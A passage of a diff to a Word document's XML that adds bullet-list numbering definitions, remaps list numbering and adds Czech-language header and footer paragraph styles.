+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04050003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04050005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04050001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04050003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04050005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04050001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04050003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04050005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3FC950B6"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4702792C"/>
@@ -2028,6 +2380,232 @@
       </w:rPr>
     </w:lvl>
     <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="527E7E24"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="3B4A088A"/>
+    <w:lvl w:ilvl="0" w:tplc="04050001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04050003">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04050005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04050001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04050003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04050005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04050001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04050003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04050005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="5BA47429"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="3086E8DC"/>
+    <w:lvl w:ilvl="0" w:tplc="04050001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04050003">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04050005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04050001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04050003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04050005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04050001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04050003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04050005" w:tentative="1">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val=""/>
@@ -2050,7 +2628,7 @@
     <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="664286676">
-    <w:abstractNumId w:val="6"/>
+    <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="822311795">
     <w:abstractNumId w:val="5"/>
@@ -2063,6 +2641,15 @@
   </w:num>
   <w:num w:numId="8" w16cid:durableId="30689541">
     <w:abstractNumId w:val="1"/>
+  </w:num>
+  <w:num w:numId="9" w16cid:durableId="780880135">
+    <w:abstractNumId w:val="8"/>
+  </w:num>
+  <w:num w:numId="10" w16cid:durableId="878663087">
+    <w:abstractNumId w:val="9"/>
+  </w:num>
+  <w:num w:numId="11" w16cid:durableId="782189453">
+    <w:abstractNumId w:val="6"/>
   </w:num>
 </w:numbering>
 </file>
@@ -2467,7 +3054,10 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="Normln">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="00776D4A"/>
+    <w:rsid w:val="00B776D8"/>
+    <w:pPr>
+      <w:jc w:val="both"/>
+    </w:pPr>
     <w:rPr>
       <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
       <w:lang w:val="cs-CZ"/>
@@ -3042,6 +3632,58 @@
     <w:rPr>
       <w:color w:val="605E5C"/>
       <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Zhlav">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="Normln"/>
+    <w:link w:val="ZhlavChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="007E71DA"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4536"/>
+        <w:tab w:val="right" w:pos="9072"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="ZhlavChar">
+    <w:name w:val="Záhlaví Char"/>
+    <w:basedOn w:val="Standardnpsmoodstavce"/>
+    <w:link w:val="Zhlav"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="007E71DA"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+      <w:lang w:val="cs-CZ"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Zpat">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="Normln"/>
+    <w:link w:val="ZpatChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="007E71DA"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4536"/>
+        <w:tab w:val="right" w:pos="9072"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="ZpatChar">
+    <w:name w:val="Zápatí Char"/>
+    <w:basedOn w:val="Standardnpsmoodstavce"/>
+    <w:link w:val="Zpat"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="007E71DA"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+      <w:lang w:val="cs-CZ"/>
     </w:rPr>
   </w:style>
 </w:styles>
